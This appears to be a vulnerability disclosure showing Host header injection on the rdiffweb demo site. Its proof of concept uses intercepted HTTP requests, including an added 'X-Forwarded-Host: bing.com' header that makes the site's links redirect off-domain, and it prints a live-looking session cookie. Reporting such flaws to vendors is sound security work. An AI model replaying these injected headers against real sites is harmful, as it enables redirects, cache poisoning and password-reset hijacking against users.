Description

A web server commonly hosts several web applications on the same IP address, referring to each application via the virtual host. In an incoming HTTP request, web servers often dispatch the request to the target virtual host based on the value supplied in the Host header. Without proper validation of the header value, the attacker can supply invalid input to cause the web server to:

Dispatch requests to the first virtual host on the list.
Perform a redirect to an attacker-controlled domain.
Perform web cache poisoning.
Manipulate password reset functionality.
Allow access to virtual hosts that were not intended to be externally accessible.

Proof of Concept

1. Go to https://rdiffweb-demo.ikus-soft.com and login using the credentials
2. After logging into the website,  refresh the page and intercept the request using burpsuite. Request will look something like this - 

GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

3. Add a header X-Forwarded-Host: bing.com in the request and send the request -

GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
X-Forwarded-Host: bing.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

4. Search for bing.com in the response and you will see that the paths have changed to bing.com.
5. Right click and select show response in browser. Copy the url and paste it in your browser
6. Now click on any tab like Repositories, status, admin area etc and you will be redirected to bing.com

Proof of Concept -

![Screenshot1](https://drive.google.com/file/d/1TvAl_Fj4qL0ldl7uzbfQagiOFUdsnuXB/view?usp=sharing)
![Screenshot2](https://drive.google.com/file/d/1jBke7umSQlYKp1zYVFuKd6yyl7DDdr4l/view?usp=sharing)
![Screenshot3](https://drive.google.com/file/d/1W2KN_d7EFWYl3TH4ptUE-AGZQq6OIKOf/view?usp=sharing)